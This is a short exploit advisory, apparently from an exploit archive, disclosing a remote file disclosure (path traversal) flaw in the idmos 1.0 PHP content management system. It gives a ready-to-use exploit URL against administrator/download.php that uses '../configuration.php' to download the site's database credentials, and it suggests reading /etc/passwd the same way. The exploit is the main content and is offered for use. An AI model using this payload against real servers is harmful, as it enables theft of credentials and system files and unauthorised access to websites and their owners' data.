--==+================================================================================+==-- --==+ idmos1.0 Remote File Discolousure Vulnerability +==-- --==+================================================================================+==-- Author: MhZ91 Title: Remote File Discolusure Vulnerability Download: http://sourceforge.net/project/showfiles.php?group_id=188355 idmos1.0 Bug: Remote File Discolousure Vulnerability Info: IDMOS is a CMS (Content Management System) that fill all requirements in IDM Method. It provides dynamic front-end and administrative tools. Multilanguage, template-based, component-base, it is written in PHP and uses MySQL as DB. Visit: http://www.inj3ct-it.org [*]---------------------------------------------------------- We can download file present on the server... for example we can get the file of db credentials, configuration.php Exploit: http://[www.example.com]/administrator/download.php?fileName=../configuration.php or try to get /etc/passwd :) [*]----------------------------------------------------------